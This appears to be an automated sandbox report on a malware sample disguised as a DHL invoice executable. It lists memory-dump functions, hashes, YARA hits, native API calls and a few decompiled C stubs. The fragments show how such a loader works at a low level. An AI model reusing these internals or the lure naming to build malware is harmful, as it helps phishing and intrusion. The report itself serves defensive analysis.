                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E2C554, Relevance: .3, Instructions: 265COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a1c7336f449363154775ff4fefd279e5e37f46fea069f3ea7ccc8f48fba7e3f
                    • Instruction ID: 43a9e94203fa25f5221e8ca09dc8a5a19477f8c34ba9cbda46bfce84f313e4c5
                    • Opcode Fuzzy Hash: 0a1c7336f449363154775ff4fefd279e5e37f46fea069f3ea7ccc8f48fba7e3f
                    • Instruction Fuzzy Hash: 45A18F32E006298FCF05DFA5D8449DEB7F2FF89304B25956AE905BB261DB71E905CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E2E8AB, Relevance: .2, Instructions: 222COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3595f3129e5f22e7a5dbd51503c341b597eb11f87485e1dd477be7283ef80472
                    • Instruction ID: 4a53886a6743ba09076352548625b010495c0757c6cd20dbb141913b78fc726d
                    • Opcode Fuzzy Hash: 3595f3129e5f22e7a5dbd51503c341b597eb11f87485e1dd477be7283ef80472
                    • Instruction Fuzzy Hash: C2C106BA811B4A8FD710CF66EC981893BA1FB86328F514709D2613B6E2D7B4144FDF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: invoice dhl.delivery document and original invoice sign.exe PID: 6188 Parent PID: 3452 invoice dhl.delivery document and original invoice sign.exeCOMMON

                    Executed Functions

                    Function 0041A40A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t29;
				intOrPtr* _t31;
				void* _t33;

				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E0041AF60(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, 0x55c68072, _t33); // executed
				return _t20;
			}







                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: b0b945ea7ac9c0154c7bd539085f630498a042f42791842d782ade54bdc43549
                    • Instruction ID: ab0f2a686f6ba0e30151440379a14482089342f8888276c55892b2385d88771f
                    • Opcode Fuzzy Hash: b0b945ea7ac9c0154c7bd539085f630498a042f42791842d782ade54bdc43549
                    • Instruction Fuzzy Hash: 7AF0F4B2200108ABCB14DF89DC80EEB77A9EF8C754F158648BE0DA7241C630ED51CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A53C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 6a87fa68acc742cbafd9a53053ce36e74d75ca4c3e0762fc499327b1afa3e1ac
                    • Instruction ID: 533771b94bd3c33c6fbbac88a19233b85bb76ba884f0643547e4572e5c36d793
                    • Opcode Fuzzy Hash: 6a87fa68acc742cbafd9a53053ce36e74d75ca4c3e0762fc499327b1afa3e1ac
                    • Instruction Fuzzy Hash: 1CF0F2B6210208ABDB18DF89CC81EEB77ADEF88754F158149FA1897241C631E912CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 13240cbdce3d59d71d7d3b9f1f3b334cfe48e050bec9053a278a5518aac78789
                    • Instruction ID: b76b14c2cb13bbf6f13999c1ac1257d3443ac47ae128eb8dd1f983b92c624ddf
                    • Opcode Fuzzy Hash: 13240cbdce3d59d71d7d3b9f1f3b334cfe48e050bec9053a278a5518aac78789
                    • Instruction Fuzzy Hash: C09002B160100403D180719944447860015E7D0345F51C462A5054555EC7A99DD576B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a3827461ea15f0bc95f2349577db0f541dc5d63362b1c37825d699e8d8bbe660
                    • Instruction ID: 57f4e4207bf9e8e6f5dcc9f63ce7977354bb346315fd60f2abcff0577c63265d
                    • Opcode Fuzzy Hash: a3827461ea15f0bc95f2349577db0f541dc5d63362b1c37825d699e8d8bbe660
                    • Instruction Fuzzy Hash: 559002A174100443D14061994454B460015E7E1345F51C466E1054555DC769DC527176
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 90a40f507da2f4e7d80de2a973e1773f1076d782c45757793210fb756b760fdc
                    • Instruction ID: d5c3abe8c4696c153ad436a750a98d30a2d44ac010f7d1c8ea71bf6d5e8c172e
                    • Opcode Fuzzy Hash: 90a40f507da2f4e7d80de2a973e1773f1076d782c45757793210fb756b760fdc
                    • Instruction Fuzzy Hash: 63900261642041535585B19944445474016F7E0285791C463A1404951CC676A856E671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 004ee9886ea51608fdfefecb2d6dc8f34f9c35047673240ad5756e1b8790dc44
                    • Instruction ID: c2213f090dd17dbf840151dbf8f1bc3692236193a31f1a2dabe37912a88a6e7b
                    • Opcode Fuzzy Hash: 004ee9886ea51608fdfefecb2d6dc8f34f9c35047673240ad5756e1b8790dc44
                    • Instruction Fuzzy Hash: 7690027160100413D151619945447470019E7D0285F91C863A0414559DD7A69952B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1f3bbb5d8028e32a0ef495b3592c8eafe2fd0165743af232e0885e17ed82c67f
                    • Instruction ID: c1e96bc8ba3ad83a7cc3a4d96e8e08bd78660c11d1b8bdf7d2563e7d4cd38e00
                    • Opcode Fuzzy Hash: 1f3bbb5d8028e32a0ef495b3592c8eafe2fd0165743af232e0885e17ed82c67f
                    • Instruction Fuzzy Hash: 1F900261A0100503D14171994444656001AE7D0285F91C473A1014556ECB759992B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 70471f52307a6c779971c94288dd5faf5f131584569771f32681f9dc507fca72
                    • Instruction ID: 7ba45445ae6d9f13d9dff87278a3770a3035281045d9f5612494e253fafc5a9b
                    • Opcode Fuzzy Hash: 70471f52307a6c779971c94288dd5faf5f131584569771f32681f9dc507fca72
                    • Instruction Fuzzy Hash: 9290026161180043D24065A94C54B470015E7D0347F51C566A0144555CCA6598616571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 315b08c4d993a63fa09a9ef1b4cba1901e11ddb03d45c2ca7a15c4ddb3d76a55
                    • Instruction ID: beb098f2da6edbdb55c26cd2edfa20ee85e3bec507828853e202a573ecce8c05
                    • Opcode Fuzzy Hash: 315b08c4d993a63fa09a9ef1b4cba1901e11ddb03d45c2ca7a15c4ddb3d76a55
                    • Instruction Fuzzy Hash: 8390027160140403D1406199485474B0015E7D0346F51C462A1154556DC775985175B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 90cf6b40b872693327868f45df0708b58eae1cc18d10d8e886f2de4681935ecc
                    • Instruction ID: f5fb8f94a1d4cb300f799b95ccb2c9f4f628ddaf8f5df29617762adc6976441e
                    • Opcode Fuzzy Hash: 90cf6b40b872693327868f45df0708b58eae1cc18d10d8e886f2de4681935ecc
                    • Instruction Fuzzy Hash: 38900261A0100043418071A988849464015FBE1255751C572A0988551DC6A9986566B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0206e25b7dd2b7999cd698a242bf7a662ea165b180ba5964d5c897cbd6b7d9a4
                    • Instruction ID: c01b980787415e6afbe0e589a0932427d78c840e4b9c1098640d7a1078b0e052
                    • Opcode Fuzzy Hash: 0206e25b7dd2b7999cd698a242bf7a662ea165b180ba5964d5c897cbd6b7d9a4
                    • Instruction Fuzzy Hash: D2900475711000030145F5DD07445470057F7D53D5351C473F1005551CD771DC717171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 88119f4641e503804201082c174653255ce18213fd37e1f3a5cfe43821a66b1c
                    • Instruction ID: 2ba0a300c21d9c19ce05cd5cd253059417c21e4ec378044ed1a69ce4f8e80f3d
                    • Opcode Fuzzy Hash: 88119f4641e503804201082c174653255ce18213fd37e1f3a5cfe43821a66b1c
                    • Instruction Fuzzy Hash: 6F9002A160200003414571994454656401AE7E0245B51C472E1004591DC67598917175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ef9b041180a8b08cb66387357acedc9a634577621b8363b8991416113b1bc27e
                    • Instruction ID: e87376751dbe1a154128e3e3f2f22526c449c7da700928916044b3664bcd9c89
                    • Opcode Fuzzy Hash: ef9b041180a8b08cb66387357acedc9a634577621b8363b8991416113b1bc27e
                    • Instruction Fuzzy Hash: 9490027160100403D14065D954486860015E7E0345F51D462A5014556EC7B598917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c8a07d161868752fbbe61e59c809833f842f7e5247b5a16b282efb47c56ed0ee
                    • Instruction ID: 978f5c06e8395180c2c03fbca7b29cef1157a16cd4a5ed615da83c3f325e847f
                    • Opcode Fuzzy Hash: c8a07d161868752fbbe61e59c809833f842f7e5247b5a16b282efb47c56ed0ee
                    • Instruction Fuzzy Hash: A590026961300003D1C07199544864A0015E7D1246F91D866A0005559CCA6598696371
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d9604c50ab73d21aea587b76505f543d0dd633afd2b2fad6586b50df85ca9cd4
                    • Instruction ID: cecccc9859f6fcbc6bb8c3a771b8ee1630e6882e7348400edd6d9d36b4cf92d5
                    • Opcode Fuzzy Hash: d9604c50ab73d21aea587b76505f543d0dd633afd2b2fad6586b50df85ca9cd4
                    • Instruction Fuzzy Hash: 7090026170100003D180719954586464015F7E1345F51D462E0404555CDA6598566272
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d970cc85e8abeecb2addee43a954350a344a747e5c78a04a11e2c72fcdaea944
                    • Instruction ID: cfc07e2c926028fe9bb3d50fc9f7db1d33eb74a7daf0273d0ab8711ac4776bae
                    • Opcode Fuzzy Hash: d970cc85e8abeecb2addee43a954350a344a747e5c78a04a11e2c72fcdaea944
                    • Instruction Fuzzy Hash: 7690027160100803D1C07199444468A0015E7D1345F91C466A0015655DCB659A5977F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014A96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7e40b9ae206dab49d2e31738ef7d2dfc1b92160ded1baf9bffbe995be2ec837b
                    • Instruction ID: eefcd787c7df66a6cdac11111f083bb3786f71aca09388d24de24efdb91f3c98
                    • Opcode Fuzzy Hash: 7e40b9ae206dab49d2e31738ef7d2dfc1b92160ded1baf9bffbe995be2ec837b
                    • Instruction Fuzzy Hash: E090027160108803D1506199844478A0015E7D0345F55C862A4414659DC7E598917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A5F6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: a98847f2e252cc0ecf61119c51841db37d5db63ff107d9f4b25a8af0771ef148
                    • Instruction ID: 39720b43df85a4fb1fcfa181b4cfd610112105b72d9cfa92d60ccc77b1d29bf3
                    • Opcode Fuzzy Hash: a98847f2e252cc0ecf61119c51841db37d5db63ff107d9f4b25a8af0771ef148
                    • Instruction Fuzzy Hash: 4C11B1B1200204AFDB14DF98CC85EEB7BACEF88764F188549F95C9B242C531E961CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 61threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: 5395406210b269f598131eee024416dc26fb76be6e5f910b34b47c189d571564
                    • Instruction ID: 83474eddad65d3c774883c75f756b4244a4566f4715317985112aa5046017eea
                    • Opcode Fuzzy Hash: 5395406210b269f598131eee024416dc26fb76be6e5f910b34b47c189d571564
                    • Instruction Fuzzy Hash: 2101D631A8032877E721A6959D42FFF77686F40B94F04015DFF04BB2C2E6B8690647EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A7C4, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 8f61b47f61b9228cdbdf73a34ceff9af0da408fbbd3f8b67346220cfb4b57c5b
                    • Instruction ID: a7984e94b4e708b053e011c713a2c9794994ba5b319c447e01f26a3516d4f082
                    • Opcode Fuzzy Hash: 8f61b47f61b9228cdbdf73a34ceff9af0da408fbbd3f8b67346220cfb4b57c5b
                    • Instruction Fuzzy Hash: 83F058B62102086BDB10EF99DC81EEB73A9EF88724F10855AFE0C97241C635E9118BB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
